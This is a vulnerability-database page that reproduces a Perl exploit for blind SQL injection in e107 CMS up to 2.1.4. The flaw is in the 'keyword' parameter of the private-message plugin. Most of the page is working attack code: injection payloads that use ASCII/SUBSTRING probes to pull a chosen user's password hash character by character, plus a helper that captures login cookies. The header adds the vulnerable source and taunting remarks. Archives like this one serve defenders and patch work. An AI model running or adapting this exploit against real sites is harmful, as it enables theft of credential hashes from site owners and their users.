Vulners
Lucene search
e107 < 2.1.4 - 'keyword' Blind SQL Injection
#!/usr/bin/perl
#
#
# e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit
#
# --------------------------------------------------------------------------
# [*] Discovered by staker - staker[at]hotmail[dot]it
# [*] Discovered on 09/03/2017
# [*] Site Vendor: http://www.e107.org
# [*] BUG: Blind SQL Injection
# --------------------------------------------------------------------------
#
#
# Description
# -------------------------------------------------------------------------
# e107 contains one flaw that allows an attacker to carry out an SQL
# injection attack. The issue is due to the "e107_plugins/pm/pm.php" script
# not properly saniting user-supplied input to the "keyword" POST variable
# This may allow an attacker to inject or manipulate sql queries in
# the backend database regardless of php.ini settings
# -------------------------------------------------------------------------
# SHORT EXPLANATION
# -----------------------------------
#
# FILE: "e107_handlers/core_functions.php"
#
# 76. function vartrue(&$val, $default='')
# 77. {
# 78. if (isset($val) && $val) { return $val; } {1} <--- variable is not sanized to be sent at the mysql database
# 79. return $default;
# 80.}
#
# ----------------------------------
#
# FILE: "e107/e107_plugins/pm/pm.php"
#
#
# 35. if(vartrue($_POST['keyword'])) {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function.
# 36. {
# 37. pm_user_lookup();
# 38.}
#
#
#
# 615. function pm_user_lookup()
# 616. {
# 617. $sql = e107::getDb();
# 618.
# 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanized
# 620. if($sql->gen($query))
# 621. {
# 622. echo '[';
# 623 while($row = $sql->fetch())
# 624. {
# 625. $u[] = "{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}";
# 626. }
# 627.
# 628. echo implode(",",$u);
# 629. echo ']';
# -----------------------------------
#
#
# use your brain..
#
# Greetz to: Warwolfz Crew,
# meh, Dante90, SHADES MASTER and nexen
#
# -- 0gay --
#
# -----------------------------------
# YOUR MOM IS NOT SAFE ANYMORE!!
# CALL HER!!
# -----------------------------------
use strict;
use IO::Socket::INET;
use LWP::UserAgent;
my ($URL,$uid) = @ARGV;
my @chars = (8..122);
my ($i,$ord,$hash) = (1,undef,undef);
if (@ARGV != 2) { usage(); }
$URL = parse::URL($URL);
syswrite (STDOUT,"[-] Crypted Password: ");
for ($i=0;$i<=60;$i++)
{
foreach $ord (@chars)
{
if (e107::Query(sql($i,$ord),$URL) == 666 )
{
syswrite (STDOUT,chr($ord));
$hash .= chr($ord);
last;
}
if ($i == 2 and not defined $hash)
{
syswrite (STDOUT,"\n[-] Exploit Failed");
exit;
}
}
}
if (length($hash) == 60) {
die "\[-]Exploit Successfully";
}
else {
die "\n[-] Exploit Failed";
}
sub e107::Query
{
# 1st parameter, sql query
# 2nd parameter, e107 website
my ($query,$URL) = @_;
my $response = undef;
my $lwp = new LWP::UserAgent;
$lwp->default_header('User-Agent' => 'Lynx (textmode)');
$response = $lwp->post($URL."/pm/",
[
keyword => $query
]) or die $!;
if ($response->content =~ /caption/) {
return 666;
}
else {
return 0;
}
}
sub parse::URL
{
my $string = shift @_ || die($!);
if ($string !~ /^http:\/\/?/i) {
$string = 'http://'.$string;
}
return $string;
}
sub sql
{
# 1st parameter, an e107's userid
# 2nd parameter substring number
# 3rd parameter charcode number
my ($i,$j,$sql) = (shift,shift,undef);
$sql = "' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#";
return $sql;
}
sub e107::Cookies
{
my ($username,$password) = @_;
my ($packet,$content);
my $host = "127.0.0.1"; # Valid Host (insert it manually)
my $path = "/e107/"; # Valid e107 path (insert it manually)
my $data = "username=",$username."&userpass=".$password."&userlogin=Sign+In";
my $socket = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
) or die $!;
$packet .= "POST ".$path."/login.php HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: Lynx (textmode)\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length:".length($data)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet.= $data;
$socket->send($packet);
while (<$socket>) {
$content .= $_;
}
if ($content =~ /Set-Cookie: (.+?)/) {
return $1;
}
else {
die("[-] Login Failed..\n");
}
# This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit.
# it works without log-in, but if you got some trouble, try to use this one.
# e107::Login('YOUR USERNAME','YOUR PASSWORD');
}
sub usage() {
print "[*---------------------------------------------------------*]\n".
"[* e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit *]\n".
"[*---------------------------------------------------------*]\n".
"[* Usage: perl web.pl [host] [uid] *]\n".
"[* *]\n".
"[* Options: *]\n".
"[* [host] insert a valid host *]\n".
"[* [uid] insert a userid *]\n".
"[*---------------------------------------------------------*]\n";
exit;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Mar 2017 00:00Current
7.4High risk
Vulners AI Score7.4